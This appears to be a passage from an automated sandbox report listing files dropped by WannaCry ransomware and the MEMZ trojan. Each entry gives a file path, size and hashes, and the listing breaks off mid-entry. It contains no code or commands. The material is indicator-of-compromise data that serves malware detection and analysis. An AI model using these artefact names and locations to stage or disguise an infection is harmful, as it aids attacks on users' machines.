745a9e4e473452a88ed60b8acaa6d0a8fdf421ecd294b79b37479b74cbb985b5

SHA512
3e56c46cd81cd20dcfaedfcaceb3036271acf41ecc5fd599e2c0bc19753a0453296550d38b16549043f140ed100ad7c54dcbaaacdc3a4ce42b7e49213e0375d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
13KB

MD5
1fb9f1058425c10b7d5e228f72234592

SHA1
4abaaa51169c89bb3540c60d8d9afbd97f49b8bf

SHA256
9ebcd123614c29f8eddfdb71cc25df480433ec009b4d5941b6d9d04b15adaa38

SHA512
e9b58669dc03c365083bcec6f09ba685eceba1ee2989f6d7af8fa5d37b3da1aa248694b384bf012650c77421d51e6310dc270ab94293eeccebb3d5aa2aed8b71

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
13KB

MD5
4fbf77c57d40f2e45f7522a6f66bb351

SHA1
e272b8294fb1742fa3aa6d7e1d65280a1b7d849f

SHA256
0d03e36eb2ccd9d03160de36194e68a98036fc7092f74ba3265dfbcb8292b273

SHA512
0e9d423789ea20ea52d5d25b53758fa0a61d28978e8c254d26c36eadcc0ec89f8170a721dc380ad02ac0a600b1d0dd80c6b63cd7129aaee9686d98e5594c61e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
13KB

MD5
73d65c02811a8582bb9d8c8b4040a987

SHA1
2ac056cb0fd1a326d437c275387a15bb56cfe635

SHA256
14379edd3a1ae4a482071c0e5c2dbb6b1a01d8c89de8ceed4c91d8bdbf135ae2

SHA512
0a27e1d693043b06892dffcf8cbe61d769dbcfabf45a53e7cb5819e8e2e4d03c65585490ef4999514a26cdd2be848e9b4ecd89abb88b2ae8b5d92c5a895e12db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
13KB

MD5
1dd507dd42a9451b3e1520eaa7351e4c

SHA1
761d480730ea696be0ba1029bb1c514b8f0941de

SHA256
a28d8953475c521d18c604f970490446118587025fab395e47ed538b17ce6325

SHA512
359f903f72deda62009ca39e3140238b5674c5590f913e807a30b43dbe676542a041d9594d4422d05b57e8822b5bff0c369c3d4de122d5e00e7e879e82800788

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
13KB

MD5
f5c0c7f742db1fb237dd065e48f20771

SHA1
4ed0788e9b39533386336022c08f9edd98e22a00

SHA256
d7716236b350c77aa236b999d13d68e2aae651e79f2c98cd5a98e65a6a86a068

SHA512
a42b430ec0325238138b83fa4b4536a3e66a67879f511cc4a929047ab9840bd0a08491d0dbe7cf132fc7b134e1f48a8d786e26f021e656f5a67153c6917b3dbb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
10KB

MD5
9f3fd50175e234e2d767485fcc816848

SHA1
e714b35eacb06d98798f3704cef5417b5408287a

SHA256
184272087ce8221f3cfead24973567d49c30dd42e168b6964df14190c8e19db6

SHA512
78e7a45dc2ef0611b8090b78a09c2954a981ca35d43afff3c05fb708686322683f76a6494e0cebd629542a920a0a66bbcd06cc0dda948acfa1a1edfc05df4c3f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
12KB

MD5
9c88c61344d0eec390ad406066bad7da

SHA1
212ec0dc5a91e6645002ae3e3428bb4856cf9802

SHA256
a5ddb886f289ff4e9f4f7dde670a1d892f7795d014eca0984a7f588db867100d

SHA512
2d594b5a3076fbaa22050f26ad44635ebe62c2ccf669f3571551b740530ec4e1d2491448c40086c247369fe0e704e34f3b45e79c18384b94e342f2dc6349b6c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\00000000.res
Filesize
136B

MD5
180b50f329a49e35e8ee62e0ba266864

SHA1
5bebaf12531dc374f4041c47fcabb261666679df

SHA256
c5baa85545e23aea10bcf2ff39217310e0291d95484dc71ac0eb5a269be7f686

SHA512
42ede1e4dca37689230458e75dd05898b13baeddf6bc6f052661a751717c324938fd11085293ab37fb2d808f1df7df5d7aed081651567171927aef0a15c7ce95

Download Submit
C:\Users\Admin\AppData\Local\Temp\311251678944450.bat
Filesize
340B

MD5
3867f2ec82a7d77c9ffefb1aac8b7903

SHA1
06fccf19b9c498b5afa2b35da00e3ab28d56f785

SHA256
4e25c23aa5babc853889d3e1e79bb01ca7650837b250314a8d50f2e2c4b6730f

SHA512
b413994e5b9f0ecb956055c7befff14845b56bb658fd8280d3213fdfa175ff76bc56e082174f2475fdf2d1f9eff618ebfd80ee2b67c091eaf1fd9c94697da5aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\@Please_Read_Me@.txt
Filesize
933B

MD5
7a2726bb6e6a79fb1d092b7f2b688af0

SHA1
b3effadce8b76aee8cd6ce2eccbb8701797468a2

SHA256
840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5

SHA512
4e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54

Download Submit
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe.lnk
Filesize
1KB

MD5
02464025879fcc9ba73bdda98215dd16

SHA1
297b033cfdfa5f7ea63e6ba0f811e4317957bf23

SHA256
40bb9f6b4542411d8b2c0ec5c75385e38daf354b96f488db27837a206ea0e4b8

SHA512
e1a9741da8998b6b8fffdf6c9f807bcde9a9f3762800e250e047041b3a72397842ddfa91c97727fe027409b306ddaff2f8105e7c22fa9f6c9201359982c367e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\MEMZ.exe
Filesize
16KB

MD5
1d5ad9c8d3fee874d0feb8bfac220a11

SHA1
ca6d3f7e6c784155f664a9179ca64e4034df9595

SHA256
3872c12d31fc9825e8661ac01ecee2572460677afbc7093f920a8436a42e28ff

SHA512
c8246f4137416be33b6d1ac89f2428b7c44d9376ac8489a9fbf65ef128a6c53fb50479e1e400c8e201c8611992ab1d6c1bd3d6cece89013edb4d35cdd22305b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\MEMZ.exe
Filesize
16KB

MD5
1d5ad9c8d3fee874d0feb8bfac220a11

SHA1
ca6d3f7e6c784155f664a9179ca64e4034df9595

SHA256
3872c12d31fc9825e8661ac01ecee2572460677afbc7093f920a8436a42e28ff

SHA512
c8246f4137416be33b6d1ac89f2428b7c44d9376ac8489a9fbf65ef128a6c53fb50479e1e400c8e201c8611992ab1d6c1bd3d6cece89013edb4d35cdd22305b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\MEMZ.exe
Filesize
16KB

MD5
1d5ad9c8d3fee874d0feb8bfac220a11

SHA1
ca6d3f7e6c784155f664a9179ca64e4034df9595

SHA256
3872c12d31fc9825e8661ac01ecee2572460677afbc7093f920a8436a42e28ff

SHA512
c8246f4137416be33b6d1ac89f2428b7c44d9376ac8489a9fbf65ef128a6c53fb50479e1e400c8e201c8611992ab1d6c1bd3d6cece89013edb4d35cdd22305b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\MEMZ.exe
Filesize
16KB

MD5
1d5ad9c8d3fee874d0feb8bfac220a11

SHA1
ca6d3f7e6c784155f664a9179ca64e4034df9595

SHA256
3872c12d31fc9825e8661ac01ecee2572460677afbc7093f920a8436a42e28ff

SHA512
c8246f4137416be33b6d1ac89f2428b7c44d9376ac8489a9fbf65ef128a6c53fb50479e1e400c8e201c8611992ab1d6c1bd3d6cece89013edb4d35cdd22305b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\MEMZ.exe
Filesize
16KB

MD5
1d5ad9c8d3fee874d0feb8bfac220a11

SHA1
ca6d3f7e6c784155f664a9179ca64e4034df9595

SHA256
3872c12d31fc9825e8661ac01ecee2572460677afbc7093f920a8436a42e28ff

SHA512
c8246f4137416be33b6d1ac89f2428b7c44d9376ac8489a9fbf65ef128a6c53fb50479e1e400c8e201c8611992ab1d6c1bd3d6cece89013edb4d35cdd22305b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\MEMZ.exe
Filesize
16KB

MD5
1d5ad9c8d3fee874d0feb8bfac220a11

SHA1
ca6d3f7e6c784155f664a9179ca64e4034df9595

SHA256
3872c12d31fc9825e8661ac01ecee2572460677afbc7093f920a8436a42e28ff

SHA512
c8246f4137416be33b6d1ac89f2428b7c44d9376ac8489a9fbf65ef128a6c53fb50479e1e400c8e201c8611992ab1d6c1bd3d6cece89013edb4d35cdd22305b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\MEMZ.exe
Filesize
16KB

MD5
1d5ad9c8d3fee874d0feb8bfac220a11

SHA1
ca6d3f7e6c784155f664a9179ca64e4034df9595

SHA256
3872c12d31fc9825e8661ac01ecee2572460677afbc7093f920a8436a42e28ff

SHA512
c8246f4137416be33b6d1ac89f2428b7c44d9376ac8489a9fbf65ef128a6c53fb50479e1e400c8e201c8611992ab1d6c1bd3d6cece89013edb4d35cdd22305b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\MEMZ.exe
Filesize
16KB

MD5
1d5ad9c8d3fee874d0feb8bfac220a11

SHA1
ca6d3f7e6c784155f664a9179ca64e4034df9595

SHA256
3872c12d31fc9825e8661ac01ecee2572460677afbc7093f920a8436a42e28ff

SHA512
c8246f4137416be33b6d1ac89f2428b7c44d9376ac8489a9fbf65ef128a6c53fb50479e1e400c8e201c8611992ab1d6c1bd3d6cece89013edb4d35cdd22305b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\LIBEAY32.dll
Filesize
3.0MB

MD5
6ed47014c3bb259874d673fb3eaedc85

SHA1
c9b29ba7e8a97729c46143cc59332d7a7e9c1ad8

SHA256
58be53d5012b3f45c1ca6f4897bece4773efbe1ccbf0be460061c183ee14ca19

SHA512
3bc462d21bc762f6eec3d23bb57e2baf532807ab8b46fab1fe38a841e5fde81ed446e5305a78ad0d513d85419e6ec8c4b54985da1d6b198acb793230aeecd93e

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\SSLEAY32.dll
Filesize
694KB

MD5
a12c2040f6fddd34e7acb42f18dd6bdc

SHA1
d7db49f1a9870a4f52e1f31812938fdea89e9444

SHA256
bd70ba598316980833f78b05f7eeaef3e0f811a7c64196bf80901d155cb647c1

SHA512
fbe0970bcdfaa23af624daad9917a030d8f0b10d38d3e9c7808a9fbc02912ee9daed293dbdea87aa90dc74470bc9b89cb6f2fe002393ecda7b565307ffb7ec00

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll
Filesize
702KB

MD5
90f50a285efa5dd9c7fddce786bdef25

SHA1
54213da21542e11d656bb65db724105afe8be688

SHA256
77a250e81fdaf9a075b1244a9434c30bf449012c9b647b265fa81a7b0db2513f

SHA512
746422be51031cfa44dd9a6f3569306c34bbe8abf9d2bd1df139d9c938d0cba095c0e05222fd08c8b6deaebef5d3f87569b08fb3261a2d123d983517fb9f43ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll
Filesize
702KB

MD5
90f50a285efa5dd9c7fddce786bdef25

SHA1
54213da21542e11d656bb65db724105afe8be688

SHA256
77a250e81fdaf9a075b1244a9434c30bf449012c9b647b265fa81a7b0db2513f

SHA512
746422be51031cfa44dd9a6f3569306c34bbe8abf9d2bd1df139d9c938d0cba095c0e05222fd08c8b6deaebef5d3f87569b08fb3261a2d123d983517fb9f43ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\libssp-0.dll
Filesize
90KB

MD5
78581e243e2b41b17452da8d0b5b2a48

SHA1
eaefb59c31cf07e60a98af48c5348759586a61bb

SHA256
f28caebe9bc6aa5a72635acb4f0e24500494e306d8e8b2279e7930981281683f

SHA512
332098113ce3f75cb20dc6e09f0d7ba03f13f5e26512d9f3bee3042c51fbb01a5e4426c5e9a5308f7f805b084efc94c28fc9426ce73ab8dfee16ab39b3efe02a

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
Filesize
3.0MB

MD5
fe7eb54691ad6e6af77f8a9a0b6de26d

SHA1
53912d33bec3375153b7e4e68b78d66dab62671a

SHA256
e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

SHA512
8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
Filesize
3.0MB

MD5
fe7eb54691ad6e6af77f8a9a0b6de26d

SHA1
53912d33bec3375153b7e4e68b78d66dab62671a

SHA256
e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

SHA512
8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\tor.exe
Filesize
3.0MB

MD5
fe7eb54691ad6e6af77f8a9a0b6de26d

SHA1
53912d33bec3375153b7e4e68b78d66dab62671a

SHA256
e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

SHA512
8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\zlib1.dll
Filesize
105KB

MD5
fb072e9f69afdb57179f59b512f828a4

SHA1
fe71b70173e46ee4e3796db9139f77dc32d2f846

SHA256
66d653397cbb2dbb397eb8421218e2c126b359a3b0decc0f31e297df099e1383

SHA512
9d157fece0dc18afe30097d9c4178ae147cc9d465a6f1d35778e1bff1efca4734dd096e95d35faea32da8d8b4560382338ba9c6c40f29047f1cc0954b27c64f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\b.wnry
Filesize
1.4MB

MD5
c17170262312f3be7027bc2ca825bf0c

SHA1
f19eceda82973239a1fdc5826bce7691e5dcb4fb

SHA256
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

SHA512
c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\c.wnry
Filesize
780B

MD5
8124a611153cd3aceb85a7ac58eaa25d

SHA1
c1d5cd8774261d810dca9b6a8e478d01cd4995d6

SHA256
0ceb451c1dbefaa8231eeb462e8ce639863eb5b8ae4fa63a353eb6e86173119e

SHA512
b9c8dfb5d58c95628528cc729d2394367c5e205328645ca6ef78a3552d9ad9f824ae20611a43a6e01daaffeffdc9094f80d772620c731e4192eb0835b8ed0f17

Download Submit
C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Filesize
3.4MB

MD5
84c82835a5d21bbcf75a61706d8ab549

SHA1
5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

SHA256
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

SHA512
90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

Download Submit
C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Filesize
3.4MB

MD5
84c82835a5d21bbcf75a61706d8ab549

SHA1
5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

SHA256
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

SHA512
90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

Download Submit
C:\Users\Admin\AppData\Local\Temp\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Filesize
3.4MB

MD5
84c82835a5d21bbcf75a61706d8ab549

SHA1
5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

SHA256
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

SHA512
90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

Download Submit
C:\Users\Admin\AppData\Local\Temp\lol.png
Filesize
11KB

MD5
3f3a8282cbdaa163c8db1e5e41793ea1

SHA1
220ba2e1ae8540e89d3a468ca4e4926851960696

SHA256
c358f6ddb8161c3b4bbe677b23185b3d2666a7eb5f74564a217bc5ddc971b7d6

SHA512
69630f19d36bf8bcf85549a667e4c0d7b4cddd44d1c907ef7e57c99a94328cf3ff6f303a9341d41d27c0f90d9e1f2dc0c169e0bbd0265e84df8025414a7f3807

Download Submit
C:\Users\Admin\AppData\Local\Temp\m.vbs
Filesize
219B

MD5
82a1fc4089755cb0b5a498ffdd52f20f

SHA1
0a8c0da8ef0354f37241e2901cf82ec9ce6474aa

SHA256
7fbdc49f4b4ba21949eca0b16c534b4882da97e94e5ca131cec1629e60439dfa

SHA512
1573a0c7333accef2695efefe1b57cba8f8d66a0061c24420ee0a183343a9a319995267d306ee85084c95580f9855bcdf9dee559b28a200b27fc3cc353315e78

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_bulgarian.wnry
Filesize
46KB

MD5
95673b0f968c0f55b32204361940d184

SHA1
81e427d15a1a826b93e91c3d2fa65221c8ca9cff

SHA256
40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

SHA512
7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_chinese (simplified).wnry
Filesize
53KB

MD5
0252d45ca21c8e43c9742285c48e91ad

SHA1
5c14551d2736eef3a1c1970cc492206e531703c1

SHA256
845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

SHA512
1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_chinese (traditional).wnry
Filesize
77KB

MD5
2efc3690d67cd073a9406a25005f7cea

SHA1
52c07f98870eabace6ec370b7eb562751e8067e9

SHA256
5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

SHA512
0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_croatian.wnry
Filesize
38KB

MD5
17194003fa70ce477326ce2f6deeb270

SHA1
e325988f68d327743926ea317abb9882f347fa73

SHA256
3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171

SHA512
dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_czech.wnry
Filesize
39KB

MD5
537efeecdfa94cc421e58fd82a58ba9e

SHA1
3609456e16bc16ba447979f3aa69221290ec17d0

SHA256
5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150

SHA512
e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_danish.wnry
Filesize
36KB

MD5
2c5a3b81d5c4715b7bea01033367fcb5

SHA1
b548b45da8463e17199daafd34c23591f94e82cd

SHA256
a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6

SHA512
490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_dutch.wnry
Filesize
36KB

MD5
7a8d499407c6a647c03c4471a67eaad7

SHA1
d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b

SHA256
2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c

SHA512
608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_english.wnry
Filesize
36KB

MD5
fe68c2dc0d2419b38f44d83f2fcf232e

SHA1
6c6e49949957215aa2f3dfb72207d249adf36283

SHA256
26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5

SHA512
941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_filipino.wnry
Filesize
36KB

MD5
08b9e69b57e4c9b966664f8e1c27ab09

SHA1
2da1025bbbfb3cd308070765fc0893a48e5a85fa

SHA256
d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324

SHA512
966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_finnish.wnry
Filesize
37KB

MD5
35c2f97eea8819b1caebd23fee732d8f

SHA1
e354d1cc43d6a39d9732adea5d3b0f57284255d2

SHA256
1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

SHA512
908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_finnish.wnry
Filesize
37KB

MD5
35c2f97eea8819b1caebd23fee732d8f

SHA1
e354d1cc43d6a39d9732adea5d3b0f57284255d2

SHA256
1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

SHA512
908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_french.wnry
Filesize
37KB

MD5
4e57113a6bf6b88fdd32782a4a381274

SHA1
0fccbc91f0f94453d91670c6794f71348711061d

SHA256
9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc

SHA512
4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_german.wnry
Filesize
36KB

MD5
3d59bbb5553fe03a89f817819540f469

SHA1
26781d4b06ff704800b463d0f1fca3afd923a9fe

SHA256
2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61

SHA512
95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_greek.wnry
Filesize
47KB

MD5
fb4e8718fea95bb7479727fde80cb424

SHA1
1088c7653cba385fe994e9ae34a6595898f20aeb

SHA256
e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9

SHA512
24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_indonesian.wnry
Filesize
36KB

MD5
3788f91c694dfc48e12417ce93356b0f

SHA1
eb3b87f7f654b604daf3484da9e02ca6c4ea98b7

SHA256
23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4

SHA512
b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_italian.wnry
Filesize
36KB

MD5
30a200f78498990095b36f574b6e8690

SHA1
c4b1b3c087bd12b063e98bca464cd05f3f7b7882

SHA256
49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07

SHA512
c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_japanese.wnry
Filesize
79KB

MD5
b77e1221f7ecd0b5d696cb66cda1609e

SHA1
51eb7a254a33d05edf188ded653005dc82de8a46

SHA256
7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e

SHA512
f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_korean.wnry
Filesize
89KB

MD5
6735cb43fe44832b061eeb3f5956b099

SHA1
d636daf64d524f81367ea92fdafa3726c909bee1

SHA256
552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0

SHA512
60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_latvian.wnry
Filesize
40KB

MD5
c33afb4ecc04ee1bcc6975bea49abe40

SHA1
fbea4f170507cde02b839527ef50b7ec74b4821f

SHA256
a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536

SHA512
0d435f0836f61a5ff55b78c02fa47b191e5807a79d8a6e991f3115743df2141b3db42ba8bdad9ad259e12f5800828e9e72d7c94a6a5259312a447d669b03ec44

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_norwegian.wnry
Filesize
36KB

MD5
ff70cc7c00951084175d12128ce02399

SHA1
75ad3b1ad4fb14813882d88e952208c648f1fd18

SHA256
cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a

SHA512
f01df3256d49325e5ec49fd265aa3f176020c8ffec60eb1d828c75a3fa18ff8634e1de824d77dfdd833768acff1f547303104620c70066a2708654a07ef22e19

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_polish.wnry
Filesize
38KB

MD5
e79d7f2833a9c2e2553c7fe04a1b63f4

SHA1
3d9f56d2381b8fe16042aa7c4feb1b33f2baebff

SHA256
519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e

SHA512
e0159c753491cac7606a7250f332e87bc6b14876bc7a1cf5625fa56ab4f09c485f7b231dd52e4ff0f5f3c29862afb1124c0efd0741613eb97a83cbe2668af5de

Download Submit
C:\Users\Admin\AppData\Local\Temp\msg\m_portuguese.wnry
Filesize
37KB

MD5
